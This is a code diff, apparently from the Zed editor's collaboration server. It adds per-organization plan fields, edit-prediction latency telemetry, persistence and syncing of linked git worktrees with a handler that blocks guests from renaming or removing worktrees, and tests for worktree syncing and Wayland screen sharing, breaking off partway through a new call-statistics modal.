@@ -4,6 +4,7 @@ mod plan;
mod timestamp;
pub mod websocket_protocol;
+use std::collections::BTreeMap;
use std::sync::Arc;
use serde::{Deserialize, Serialize};
@@ -21,6 +22,10 @@ pub struct GetAuthenticatedUserResponse {
pub feature_flags: Vec<String>,
#[serde(default)]
pub organizations: Vec<Organization>,
+ #[serde(default)]
+ pub default_organization_id: Option<OrganizationId>,
+ #[serde(default)]
+ pub plans_by_organization: BTreeMap<OrganizationId, KnownOrUnknown<Plan, String>>,
pub plan: PlanInfo,
}
@@ -35,7 +40,7 @@ pub struct AuthenticatedUser {
pub accepted_tos_at: Option<Timestamp>,
}
-#[derive(Debug, PartialEq, Eq, Hash, Clone, Serialize, Deserialize)]
+#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Serialize, Deserialize)]
pub struct OrganizationId(pub Arc<str>);
#[derive(Debug, PartialEq, Serialize, Deserialize)]
@@ -9,6 +9,7 @@ pub enum Plan {
ZedFree,
ZedPro,
ZedProTrial,
+ ZedBusiness,
ZedStudent,
}
@@ -111,7 +111,8 @@ pub struct PredictEditsBody {
pub trigger: PredictEditsRequestTrigger,
}
-#[derive(Default, Debug, Clone, Copy, Serialize, Deserialize)]
+#[derive(Default, Debug, Clone, Copy, Serialize, Deserialize, strum::AsRefStr)]
+#[strum(serialize_all = "snake_case")]
pub enum PredictEditsRequestTrigger {
Testing,
Diagnostics,
@@ -144,6 +145,8 @@ pub struct AcceptEditPredictionBody {
pub request_id: String,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub model_version: Option<String>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub e2e_latency_ms: Option<u128>,
}
#[derive(Debug, Clone, Deserialize)]
@@ -164,9 +167,14 @@ pub struct EditPredictionRejection {
pub was_shown: bool,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub model_version: Option<String>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub e2e_latency_ms: Option<u128>,
}
-#[derive(Default, Debug, Clone, Copy, Serialize, Deserialize, PartialEq)]
+#[derive(
+ Default, Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, Hash, strum::AsRefStr,
+)]
+#[strum(serialize_all = "snake_case")]
pub enum EditPredictionRejectReason {
/// New requests were triggered before this one completed
Canceled,
@@ -109,6 +109,7 @@ CREATE TABLE "project_repositories" (
"head_commit_details" VARCHAR,
"remote_upstream_url" VARCHAR,
"remote_origin_url" VARCHAR,
+ "linked_worktrees" VARCHAR,
PRIMARY KEY (project_id, id)
);
@@ -1,3 +1,6 @@
+-- This file is auto-generated. Do not modify it by hand.
+-- To regenerate, run `cargo xtask db dump-schema app --collab` from the Cloud repository.
+
CREATE EXTENSION IF NOT EXISTS pg_trgm WITH SCHEMA public;
CREATE TABLE public.breakpoints (
@@ -304,7 +307,8 @@ CREATE TABLE public.project_repositories (
head_commit_details character varying,
merge_message character varying,
remote_upstream_url character varying,
- remote_origin_url character varying
+ remote_origin_url character varying,
+ linked_worktrees text
);
CREATE TABLE public.project_repository_statuses (
@@ -315,10 +319,10 @@ CREATE TABLE public.project_repository_statuses (
status_kind integer NOT NULL,
first_status integer,
second_status integer,
- lines_added integer,
- lines_deleted integer,
scan_id bigint NOT NULL,
- is_deleted boolean NOT NULL
+ is_deleted boolean NOT NULL,
+ lines_added integer,
+ lines_deleted integer
);
CREATE TABLE public.projects (
@@ -706,6 +710,8 @@ CREATE INDEX trigram_index_extensions_name ON public.extensions USING gin (name
CREATE INDEX trigram_index_users_on_github_login ON public.users USING gin (github_login public.gin_trgm_ops);
+CREATE INDEX trigram_index_users_on_name ON public.users USING gin (name public.gin_trgm_ops);
+
CREATE UNIQUE INDEX uix_channels_parent_path_name ON public.channels USING btree (parent_path, name) WHERE ((parent_path IS NOT NULL) AND (parent_path <> ''::text));
CREATE UNIQUE INDEX uix_users_on_github_user_id ON public.users USING btree (github_user_id);
@@ -753,7 +759,7 @@ ALTER TABLE ONLY public.contacts
ADD CONSTRAINT contacts_user_id_b_fkey FOREIGN KEY (user_id_b) REFERENCES public.users(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.contributors
- ADD CONSTRAINT contributors_user_id_fkey FOREIGN KEY (user_id) REFERENCES public.users(id);
+ ADD CONSTRAINT contributors_user_id_fkey FOREIGN KEY (user_id) REFERENCES public.users(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.extension_versions
ADD CONSTRAINT extension_versions_extension_id_fkey FOREIGN KEY (extension_id) REFERENCES public.extensions(id);
@@ -374,6 +374,9 @@ impl Database {
merge_message: ActiveValue::set(update.merge_message.clone()),
remote_upstream_url: ActiveValue::set(update.remote_upstream_url.clone()),
remote_origin_url: ActiveValue::set(update.remote_origin_url.clone()),
+ linked_worktrees: ActiveValue::Set(Some(
+ serde_json::to_string(&update.linked_worktrees).unwrap(),
+ )),
})
.on_conflict(
OnConflict::columns([
@@ -388,6 +391,7 @@ impl Database {
project_repository::Column::CurrentMergeConflicts,
project_repository::Column::HeadCommitDetails,
project_repository::Column::MergeMessage,
+ project_repository::Column::LinkedWorktrees,
])
.to_owned(),
)
@@ -883,6 +887,11 @@ impl Database {
remote_upstream_url: db_repository_entry.remote_upstream_url.clone(),
remote_origin_url: db_repository_entry.remote_origin_url.clone(),
original_repo_abs_path: Some(db_repository_entry.abs_path),
+ linked_worktrees: db_repository_entry
+ .linked_worktrees
+ .as_deref()
+ .and_then(|s| serde_json::from_str(s).ok())
+ .unwrap_or_default(),
});
}
}
@@ -799,6 +799,11 @@ impl Database {
remote_upstream_url: db_repository.remote_upstream_url.clone(),
remote_origin_url: db_repository.remote_origin_url.clone(),
original_repo_abs_path: Some(db_repository.abs_path),
+ linked_worktrees: db_repository
+ .linked_worktrees
+ .as_deref()
+ .and_then(|s| serde_json::from_str(s).ok())
+ .unwrap_or_default(),
});
}
}
@@ -24,6 +24,8 @@ pub struct Model {
pub head_commit_details: Option<String>,
pub remote_upstream_url: Option<String>,
pub remote_origin_url: Option<String>,
+ // JSON array of linked worktree objects
+ pub linked_worktrees: Option<String>,
}
#[derive(Copy, Clone, Debug, EnumIter, DeriveRelation)]
@@ -439,6 +439,8 @@ impl Server {
.add_request_handler(forward_mutating_project_request::<proto::GitRemoveRemote>)
.add_request_handler(forward_read_only_project_request::<proto::GitGetWorktrees>)
.add_request_handler(forward_mutating_project_request::<proto::GitCreateWorktree>)
+ .add_request_handler(disallow_guest_request::<proto::GitRemoveWorktree>)
+ .add_request_handler(disallow_guest_request::<proto::GitRenameWorktree>)
.add_request_handler(forward_mutating_project_request::<proto::CheckForPushedCommits>)
.add_message_handler(broadcast_project_message_from_host::<proto::AdvertiseContexts>)
.add_message_handler(update_context)
@@ -2250,6 +2252,24 @@ where
Ok(())
}
+async fn disallow_guest_request<T>(
+ _request: T,
+ response: Response<T>,
+ _session: MessageContext,
+) -> Result<()>
+where
+ T: RequestMessage,
+{
+ response.peer.respond_with_error(
+ response.receipt,
+ ErrorCode::Forbidden
+ .message("request is not allowed for guests".to_string())
+ .to_proto(),
+ )?;
+ response.responded.store(true, SeqCst);
+ Ok(())
+}
+
async fn lsp_query(
request: proto::LspQuery,
response: Response<proto::LspQuery>,
@@ -4721,6 +4721,54 @@ async fn test_copy_file_location(cx_a: &mut TestAppContext, cx_b: &mut TestAppCo
cx_b.read_from_clipboard().and_then(|item| item.text()),
Some(format!("{}:2", path!("src/main.rs")))
);
+
+ editor_a.update_in(cx_a, |editor, window, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(16)..MultiBufferOffset(44)]);
+ });
+ editor.copy_file_location(&CopyFileLocation, window, cx);
+ });
+
+ assert_eq!(
+ cx_a.read_from_clipboard().and_then(|item| item.text()),
+ Some(format!("{}:2-3", path!("src/main.rs")))
+ );
+
+ editor_b.update_in(cx_b, |editor, window, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(16)..MultiBufferOffset(44)]);
+ });
+ editor.copy_file_location(&CopyFileLocation, window, cx);
+ });
+
+ assert_eq!(
+ cx_b.read_from_clipboard().and_then(|item| item.text()),
+ Some(format!("{}:2-3", path!("src/main.rs")))
+ );
+
+ editor_a.update_in(cx_a, |editor, window, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(16)..MultiBufferOffset(43)]);
+ });
+ editor.copy_file_location(&CopyFileLocation, window, cx);
+ });
+
+ assert_eq!(
+ cx_a.read_from_clipboard().and_then(|item| item.text()),
+ Some(format!("{}:2", path!("src/main.rs")))
+ );
+
+ editor_b.update_in(cx_b, |editor, window, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(16)..MultiBufferOffset(43)]);
+ });
+ editor.copy_file_location(&CopyFileLocation, window, cx);
+ });
+
+ assert_eq!(
+ cx_b.read_from_clipboard().and_then(|item| item.text()),
+ Some(format!("{}:2", path!("src/main.rs")))
+ );
}
#[track_caller]
@@ -5643,7 +5691,7 @@ async fn test_document_symbols(cx_a: &mut TestAppContext, cx_b: &mut TestAppCont
executor.run_until_parked();
editor_a.update(cx_a, |editor, cx| {
- let breadcrumbs = editor
+ let (breadcrumbs, _) = editor
.breadcrumbs(cx)
.expect("Host should have breadcrumbs");
let texts: Vec<_> = breadcrumbs.iter().map(|b| b.text.as_str()).collect();
@@ -5679,6 +5727,7 @@ async fn test_document_symbols(cx_a: &mut TestAppContext, cx_b: &mut TestAppCont
editor
.breadcrumbs(cx)
.expect("Client B should have breadcrumbs")
+ .0
.iter()
.map(|b| b.text.as_str())
.collect::<Vec<_>>(),
@@ -1,9 +1,10 @@
use std::path::{Path, PathBuf};
use call::ActiveCall;
+use client::RECEIVE_TIMEOUT;
use collections::HashMap;
use git::{
- repository::RepoPath,
+ repository::{RepoPath, Worktree as GitWorktree},
status::{DiffStat, FileStatus, StatusCode, TrackedStatus},
};
use git_ui::{git_panel::GitPanel, project_diff::ProjectDiff};
@@ -214,7 +215,7 @@ async fn test_remote_git_worktrees(
repo_b.update(cx, |repository, _| {
repository.create_worktree(
"feature-branch".to_string(),
- worktree_directory.clone(),
+ worktree_directory.join("feature-branch"),
Some("abc123".to_string()),
)
})
@@ -234,7 +235,10 @@ async fn test_remote_git_worktrees(
assert_eq!(worktrees.len(), 2);
assert_eq!(worktrees[0].path, PathBuf::from(path!("/project")));
assert_eq!(worktrees[1].path, worktree_directory.join("feature-branch"));
- assert_eq!(worktrees[1].ref_name.as_ref(), "refs/heads/feature-branch");
+ assert_eq!(
+ worktrees[1].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
assert_eq!(worktrees[1].sha.as_ref(), "abc123");
// Verify from the host side that the worktree was actually created
@@ -265,7 +269,7 @@ async fn test_remote_git_worktrees(
repo_b.update(cx, |repository, _| {
repository.create_worktree(
"bugfix-branch".to_string(),
- worktree_directory.clone(),
+ worktree_directory.join("bugfix-branch"),
None,
)
})
@@ -286,7 +290,7 @@ async fn test_remote_git_worktrees(
let feature_worktree = worktrees
.iter()
- .find(|worktree| worktree.ref_name.as_ref() == "refs/heads/feature-branch")
+ .find(|worktree| worktree.ref_name == Some("refs/heads/feature-branch".into()))
.expect("should find feature-branch worktree");
assert_eq!(
feature_worktree.path,
@@ -295,13 +299,307 @@ async fn test_remote_git_worktrees(
let bugfix_worktree = worktrees
.iter()
- .find(|worktree| worktree.ref_name.as_ref() == "refs/heads/bugfix-branch")
+ .find(|worktree| worktree.ref_name == Some("refs/heads/bugfix-branch".into()))
.expect("should find bugfix-branch worktree");
assert_eq!(
bugfix_worktree.path,
worktree_directory.join("bugfix-branch")
);
assert_eq!(bugfix_worktree.sha.as_ref(), "fake-sha");
+
+ // Client B (guest) attempts to rename a worktree. This should fail
+ // because worktree renaming is not forwarded through collab
+ let rename_result = cx_b
+ .update(|cx| {
+ repo_b.update(cx, |repository, _| {
+ repository.rename_worktree(
+ worktree_directory.join("feature-branch"),
+ worktree_directory.join("renamed-branch"),
+ )
+ })
+ })
+ .await
+ .unwrap();
+ assert!(
+ rename_result.is_err(),
+ "Guest should not be able to rename worktrees via collab"
+ );
+
+ executor.run_until_parked();
+
+ // Verify worktrees are unchanged — still 3
+ let worktrees = cx_b
+ .update(|cx| repo_b.update(cx, |repository, _| repository.worktrees()))
+ .await
+ .unwrap()
+ .unwrap();
+ assert_eq!(
+ worktrees.len(),
+ 3,
+ "Worktree count should be unchanged after failed rename"
+ );
+
+ // Client B (guest) attempts to remove a worktree. This should fail
+ // because worktree removal is not forwarded through collab
+ let remove_result = cx_b
+ .update(|cx| {
+ repo_b.update(cx, |repository, _| {
+ repository.remove_worktree(worktree_directory.join("feature-branch"), false)
+ })
+ })
+ .await
+ .unwrap();
+ assert!(
+ remove_result.is_err(),
+ "Guest should not be able to remove worktrees via collab"
+ );
+
+ executor.run_until_parked();
+
+ // Verify worktrees are unchanged — still 3
+ let worktrees = cx_b
+ .update(|cx| repo_b.update(cx, |repository, _| repository.worktrees()))
+ .await
+ .unwrap()
+ .unwrap();
+ assert_eq!(
+ worktrees.len(),
+ 3,
+ "Worktree count should be unchanged after failed removal"
+ );
+}
+
+#[gpui::test]
+async fn test_linked_worktrees_sync(
+ executor: BackgroundExecutor,
+ cx_a: &mut TestAppContext,
+ cx_b: &mut TestAppContext,
+ cx_c: &mut TestAppContext,
+) {
+ let mut server = TestServer::start(executor.clone()).await;
+ let client_a = server.create_client(cx_a, "user_a").await;
+ let client_b = server.create_client(cx_b, "user_b").await;
+ let client_c = server.create_client(cx_c, "user_c").await;
+ server
+ .create_room(&mut [(&client_a, cx_a), (&client_b, cx_b), (&client_c, cx_c)])
+ .await;
+ let active_call_a = cx_a.read(ActiveCall::global);
+
+ // Set up a git repo with two linked worktrees already present.
+ client_a
+ .fs()
+ .insert_tree(
+ path!("/project"),
+ json!({ ".git": {}, "file.txt": "content" }),
+ )
+ .await;
+
+ client_a
+ .fs()
+ .with_git_state(Path::new(path!("/project/.git")), true, |state| {
+ state.worktrees.push(GitWorktree {
+ path: PathBuf::from(path!("/project")),
+ ref_name: Some("refs/heads/main".into()),
+ sha: "aaa111".into(),
+ });
+ state.worktrees.push(GitWorktree {
+ path: PathBuf::from(path!("/project/feature-branch")),
+ ref_name: Some("refs/heads/feature-branch".into()),
+ sha: "bbb222".into(),
+ });
+ state.worktrees.push(GitWorktree {
+ path: PathBuf::from(path!("/project/bugfix-branch")),
+ ref_name: Some("refs/heads/bugfix-branch".into()),
+ sha: "ccc333".into(),
+ });
+ })
+ .unwrap();
+
+ let (project_a, _) = client_a.build_local_project(path!("/project"), cx_a).await;
+
+ // Wait for git scanning to complete on the host.
+ executor.run_until_parked();
+
+ // Verify the host sees 2 linked worktrees (main worktree is filtered out).
+ let host_linked = project_a.read_with(cx_a, |project, cx| {
+ let repos = project.repositories(cx);
+ assert_eq!(repos.len(), 1, "host should have exactly 1 repository");
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ host_linked.len(),
+ 2,
+ "host should have 2 linked worktrees (main filtered out)"
+ );
+ assert_eq!(
+ host_linked[0].path,
+ PathBuf::from(path!("/project/feature-branch"))
+ );
+ assert_eq!(
+ host_linked[0].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
+ assert_eq!(host_linked[0].sha.as_ref(), "bbb222");
+ assert_eq!(
+ host_linked[1].path,
+ PathBuf::from(path!("/project/bugfix-branch"))
+ );
+ assert_eq!(
+ host_linked[1].ref_name,
+ Some("refs/heads/bugfix-branch".into())
+ );
+ assert_eq!(host_linked[1].sha.as_ref(), "ccc333");
+
+ // Share the project and have client B join.
+ let project_id = active_call_a
+ .update(cx_a, |call, cx| call.share_project(project_a.clone(), cx))
+ .await
+ .unwrap();
+ let project_b = client_b.join_remote_project(project_id, cx_b).await;
+
+ executor.run_until_parked();
+
+ // Verify the guest sees the same linked worktrees as the host.
+ let guest_linked = project_b.read_with(cx_b, |project, cx| {
+ let repos = project.repositories(cx);
+ assert_eq!(repos.len(), 1, "guest should have exactly 1 repository");
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ guest_linked, host_linked,
+ "guest's linked_worktrees should match host's after initial sync"
+ );
+
+ // Now mutate: add a third linked worktree on the host side.
+ client_a
+ .fs()
+ .with_git_state(Path::new(path!("/project/.git")), true, |state| {
+ state.worktrees.push(GitWorktree {
+ path: PathBuf::from(path!("/project/hotfix-branch")),
+ ref_name: Some("refs/heads/hotfix-branch".into()),
+ sha: "ddd444".into(),
+ });
+ })
+ .unwrap();
+
+ // Wait for the host to re-scan and propagate the update.
+ executor.run_until_parked();
+
+ // Verify host now sees 3 linked worktrees.
+ let host_linked_updated = project_a.read_with(cx_a, |project, cx| {
+ let repos = project.repositories(cx);
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ host_linked_updated.len(),
+ 3,
+ "host should now have 3 linked worktrees"
+ );
+ assert_eq!(
+ host_linked_updated[2].path,
+ PathBuf::from(path!("/project/hotfix-branch"))
+ );
+
+ // Verify the guest also received the update.
+ let guest_linked_updated = project_b.read_with(cx_b, |project, cx| {
+ let repos = project.repositories(cx);
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ guest_linked_updated, host_linked_updated,
+ "guest's linked_worktrees should match host's after update"
+ );
+
+ // Now mutate: remove one linked worktree from the host side.
+ client_a
+ .fs()
+ .with_git_state(Path::new(path!("/project/.git")), true, |state| {
+ state
+ .worktrees
+ .retain(|wt| wt.ref_name != Some("refs/heads/bugfix-branch".into()));
+ })
+ .unwrap();
+
+ executor.run_until_parked();
+
+ // Verify host now sees 2 linked worktrees (feature-branch and hotfix-branch).
+ let host_linked_after_removal = project_a.read_with(cx_a, |project, cx| {
+ let repos = project.repositories(cx);
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ host_linked_after_removal.len(),
+ 2,
+ "host should have 2 linked worktrees after removal"
+ );
+ assert!(
+ host_linked_after_removal
+ .iter()
+ .all(|wt| wt.ref_name != Some("refs/heads/bugfix-branch".into())),
+ "bugfix-branch should have been removed"
+ );
+
+ // Verify the guest also reflects the removal.
+ let guest_linked_after_removal = project_b.read_with(cx_b, |project, cx| {
+ let repos = project.repositories(cx);
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ guest_linked_after_removal, host_linked_after_removal,
+ "guest's linked_worktrees should match host's after removal"
+ );
+
+ // Test DB roundtrip: client C joins late, getting state from the database.
+ // This verifies that linked_worktrees are persisted and restored correctly.
+ let project_c = client_c.join_remote_project(project_id, cx_c).await;
+ executor.run_until_parked();
+
+ let late_joiner_linked = project_c.read_with(cx_c, |project, cx| {
+ let repos = project.repositories(cx);
+ assert_eq!(
+ repos.len(),
+ 1,
+ "late joiner should have exactly 1 repository"
+ );
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ late_joiner_linked, host_linked_after_removal,
+ "late-joining client's linked_worktrees should match host's (DB roundtrip)"
+ );
+
+ // Test reconnection: disconnect client B (guest) and reconnect.
+ // After rejoining, client B should get linked_worktrees back from the DB.
+ server.disconnect_client(client_b.peer_id().unwrap());
+ executor.advance_clock(RECEIVE_TIMEOUT);
+ executor.run_until_parked();
+
+ // Client B reconnects automatically.
+ executor.advance_clock(RECEIVE_TIMEOUT);
+ executor.run_until_parked();
+
+ // Verify client B still has the correct linked worktrees after reconnection.
+ let guest_linked_after_reconnect = project_b.read_with(cx_b, |project, cx| {
+ let repos = project.repositories(cx);
+ assert_eq!(
+ repos.len(),
+ 1,
+ "guest should still have exactly 1 repository after reconnect"
+ );
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ guest_linked_after_reconnect, host_linked_after_removal,
+ "guest's linked_worktrees should survive guest disconnect/reconnect"
+ );
}
#[gpui::test]
@@ -1787,6 +1787,7 @@ async fn test_project_reconnect(
// While disconnected, close project 3
cx_a.update(|_| drop(project_a3));
+ executor.run_until_parked();
// Client B reconnects. They re-join the room and the remaining shared project.
server.allow_connections();
@@ -6595,6 +6596,151 @@ async fn test_join_call_after_screen_was_shared(
});
}
+#[cfg(target_os = "linux")]
+#[gpui::test(iterations = 10)]
+async fn test_share_screen_wayland(
+ executor: BackgroundExecutor,
+ cx_a: &mut TestAppContext,
+ cx_b: &mut TestAppContext,
+) {
+ let mut server = TestServer::start(executor.clone()).await;
+
+ let client_a = server.create_client(cx_a, "user_a").await;
+ let client_b = server.create_client(cx_b, "user_b").await;
+ server
+ .make_contacts(&mut [(&client_a, cx_a), (&client_b, cx_b)])
+ .await;
+
+ let active_call_a = cx_a.read(ActiveCall::global);
+ let active_call_b = cx_b.read(ActiveCall::global);
+
+ // User A calls user B.
+ active_call_a
+ .update(cx_a, |call, cx| {
+ call.invite(client_b.user_id().unwrap(), None, cx)
+ })
+ .await
+ .unwrap();
+
+ // User B accepts.
+ let mut incoming_call_b = active_call_b.read_with(cx_b, |call, _| call.incoming());
+ executor.run_until_parked();
+ incoming_call_b.next().await.unwrap().unwrap();
+ active_call_b
+ .update(cx_b, |call, cx| call.accept_incoming(cx))
+ .await
+ .unwrap();
+
+ let room_a = active_call_a.read_with(cx_a, |call, _| call.room().unwrap().clone());
+ let room_b = active_call_b.read_with(cx_b, |call, _| call.room().unwrap().clone());
+ executor.run_until_parked();
+
+ // User A shares their screen via the Wayland path.
+ let events_b = active_call_events(cx_b);
+ active_call_a
+ .update(cx_a, |call, cx| {
+ call.room()
+ .unwrap()
+ .update(cx, |room, cx| room.share_screen_wayland(cx))
+ })
+ .await
+ .unwrap();
+
+ executor.run_until_parked();
+
+ // Room A is sharing and has a nonzero synthetic screen ID.
+ room_a.read_with(cx_a, |room, _| {
+ assert!(room.is_sharing_screen());
+ let screen_id = room.shared_screen_id();
+ assert!(screen_id.is_some(), "shared_screen_id should be Some");
+ assert_ne!(screen_id.unwrap(), 0, "synthetic ID must be nonzero");
+ });
+
+ // User B observes the remote screen sharing track.
+ assert_eq!(events_b.borrow().len(), 1);
+ if let call::room::Event::RemoteVideoTracksChanged { participant_id } =
+ events_b.borrow().first().unwrap()
+ {
+ assert_eq!(*participant_id, client_a.peer_id().unwrap());
+ room_b.read_with(cx_b, |room, _| {
+ assert_eq!(
+ room.remote_participants()[&client_a.user_id().unwrap()]
+ .video_tracks
+ .len(),
+ 1
+ );
+ });
+ } else {
+ panic!("expected RemoteVideoTracksChanged event");
+ }
+}
+
+#[cfg(target_os = "linux")]
+#[gpui::test(iterations = 10)]
+async fn test_unshare_screen_wayland(
+ executor: BackgroundExecutor,
+ cx_a: &mut TestAppContext,
+ cx_b: &mut TestAppContext,
+) {
+ let mut server = TestServer::start(executor.clone()).await;
+
+ let client_a = server.create_client(cx_a, "user_a").await;
+ let client_b = server.create_client(cx_b, "user_b").await;
+ server
+ .make_contacts(&mut [(&client_a, cx_a), (&client_b, cx_b)])
+ .await;
+
+ let active_call_a = cx_a.read(ActiveCall::global);
+ let active_call_b = cx_b.read(ActiveCall::global);
+
+ // User A calls user B.
+ active_call_a
+ .update(cx_a, |call, cx| {
+ call.invite(client_b.user_id().unwrap(), None, cx)
+ })
+ .await
+ .unwrap();
+
+ // User B accepts.
+ let mut incoming_call_b = active_call_b.read_with(cx_b, |call, _| call.incoming());
+ executor.run_until_parked();
+ incoming_call_b.next().await.unwrap().unwrap();
+ active_call_b
+ .update(cx_b, |call, cx| call.accept_incoming(cx))
+ .await
+ .unwrap();
+
+ let room_a = active_call_a.read_with(cx_a, |call, _| call.room().unwrap().clone());
+ executor.run_until_parked();
+
+ // User A shares their screen via the Wayland path.
+ active_call_a
+ .update(cx_a, |call, cx| {
+ call.room()
+ .unwrap()
+ .update(cx, |room, cx| room.share_screen_wayland(cx))
+ })
+ .await
+ .unwrap();
+ executor.run_until_parked();
+
+ room_a.read_with(cx_a, |room, _| {
+ assert!(room.is_sharing_screen());
+ });
+
+ // User A stops sharing.
+ room_a
+ .update(cx_a, |room, cx| room.unshare_screen(true, cx))
+ .unwrap();
+ executor.run_until_parked();
+
+ // Room A is no longer sharing, screen ID is gone.
+ room_a.read_with(cx_a, |room, _| {
+ assert!(!room.is_sharing_screen());
+ assert!(room.shared_screen_id().is_none());
+ });
+}
+
#[gpui::test]
async fn test_right_click_menu_behind_collab_panel(cx: &mut TestAppContext) {
let mut server = TestServer::start(cx.executor().clone()).await;
@@ -473,7 +473,7 @@ async fn test_ssh_collaboration_git_worktrees(
repo_b.update(cx, |repo, _| {
repo.create_worktree(
"feature-branch".to_string(),
- worktree_directory.clone(),
+ worktree_directory.join("feature-branch"),
Some("abc123".to_string()),
)
})
@@ -491,7 +491,10 @@ async fn test_ssh_collaboration_git_worktrees(
.unwrap();
assert_eq!(worktrees.len(), 2);
assert_eq!(worktrees[1].path, worktree_directory.join("feature-branch"));
- assert_eq!(worktrees[1].ref_name.as_ref(), "refs/heads/feature-branch");
+ assert_eq!(
+ worktrees[1].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
assert_eq!(worktrees[1].sha.as_ref(), "abc123");
let server_worktrees = {
@@ -518,6 +521,122 @@ async fn test_ssh_collaboration_git_worktrees(
server_worktrees[1].path,
worktree_directory.join("feature-branch")
);
+
+ // Host (client A) renames the worktree via SSH
+ let repo_a = cx_a.update(|cx| {
+ project_a
+ .read(cx)
+ .repositories(cx)
+ .values()
+ .next()
+ .unwrap()
+ .clone()
+ });
+ cx_a.update(|cx| {
+ repo_a.update(cx, |repository, _| {
+ repository.rename_worktree(
+ PathBuf::from("/project/feature-branch"),
+ PathBuf::from("/project/renamed-branch"),
+ )
+ })
+ })
+ .await
+ .unwrap()
+ .unwrap();
+
+ executor.run_until_parked();
+
+ let host_worktrees = cx_a
+ .update(|cx| repo_a.update(cx, |repository, _| repository.worktrees()))
+ .await
+ .unwrap()
+ .unwrap();
+ assert_eq!(
+ host_worktrees.len(),
+ 2,
+ "Host should still have 2 worktrees after rename"
+ );
+ assert_eq!(
+ host_worktrees[1].path,
+ PathBuf::from("/project/renamed-branch")
+ );
+
+ let server_worktrees = {
+ let server_repo = server_cx.update(|cx| {
+ headless_project.update(cx, |headless_project, cx| {
+ headless_project
+ .git_store
+ .read(cx)
+ .repositories()
+ .values()
+ .next()
+ .unwrap()
+ .clone()
+ })
+ });
+ server_cx
+ .update(|cx| server_repo.update(cx, |repo, _| repo.worktrees()))
+ .await
+ .unwrap()
+ .unwrap()
+ };
+ assert_eq!(
+ server_worktrees.len(),
+ 2,
+ "Server should still have 2 worktrees after rename"
+ );
+ assert_eq!(
+ server_worktrees[1].path,
+ PathBuf::from("/project/renamed-branch")
+ );
+
+ // Host (client A) removes the renamed worktree via SSH
+ cx_a.update(|cx| {
+ repo_a.update(cx, |repository, _| {
+ repository.remove_worktree(PathBuf::from("/project/renamed-branch"), false)
+ })
+ })
+ .await
+ .unwrap()
+ .unwrap();
+
+ executor.run_until_parked();
+
+ let host_worktrees = cx_a
+ .update(|cx| repo_a.update(cx, |repository, _| repository.worktrees()))
+ .await
+ .unwrap()
+ .unwrap();
+ assert_eq!(
+ host_worktrees.len(),
+ 1,
+ "Host should only have the main worktree after removal"
+ );
+
+ let server_worktrees = {
+ let server_repo = server_cx.update(|cx| {
+ headless_project.update(cx, |headless_project, cx| {
+ headless_project
+ .git_store
+ .read(cx)
+ .repositories()
+ .values()
+ .next()
+ .unwrap()
+ .clone()
+ })
+ });
+ server_cx
+ .update(|cx| server_repo.update(cx, |repo, _| repo.worktrees()))
+ .await
+ .unwrap()
+ .unwrap()
+ };
+ assert_eq!(
+ server_worktrees.len(),
+ 1,
+ "Server should only have the main worktree after removal"
+ );
}
#[gpui::test]
@@ -40,6 +40,7 @@ editor.workspace = true
futures.workspace = true
fuzzy.workspace = true
gpui.workspace = true
+livekit_client.workspace = true
log.workspace = true
menu.workspace = true
notifications.workspace = true
@@ -59,6 +60,7 @@ title_bar.workspace = true
ui.workspace = true
util.workspace = true
workspace.workspace = true
+zed_actions.workspace = true
[dev-dependencies]
call = { workspace = true, features = ["test-support"] }
@@ -0,0 +1,270 @@
+use call::{ActiveCall, Room, room};
+use gpui::{
+ DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, FontWeight, Render, Subscription,
+ Window,
+};
+use livekit_client::ConnectionQuality;
+use ui::prelude::*;
+use workspace::{ModalView, Workspace};
+use zed_actions::ShowCallStats;
+
+pub fn init(cx: &mut App) {
+ cx.observe_new(|workspace: &mut Workspace, _, _cx| {
+ workspace.register_action(|workspace, _: &ShowCallStats, window, cx| {
+ workspace.toggle_modal(window, cx, |_window, cx| CallStatsModal::new(cx));
+ });
+ })
+ .detach();
+}
+
+pub struct CallStatsModal {
+ focus_handle: FocusHandle,
+ _active_call_subscription: Option<Subscription>,
+ _diagnostics_subscription: Option<Subscription>,
+}
+
+impl CallStatsModal {
+ fn new(cx: &mut Context<Self>) -> Self {
+ let mut this = Self {
+ focus_handle: cx.focus_handle(),
+ _active_call_subscription: None,
+ _diagnostics_subscription: None,
+ };
+
+ if let Some(active_call) = ActiveCall::try_global(cx) {
+ this._active_call_subscription =
+ Some(cx.subscribe(&active_call, Self::handle_call_event));
+ this.observe_diagnostics(cx);
+ }
+
+ this
+ }
+
+ fn observe_diagnostics(&mut self, cx: &mut Context<Self>) {
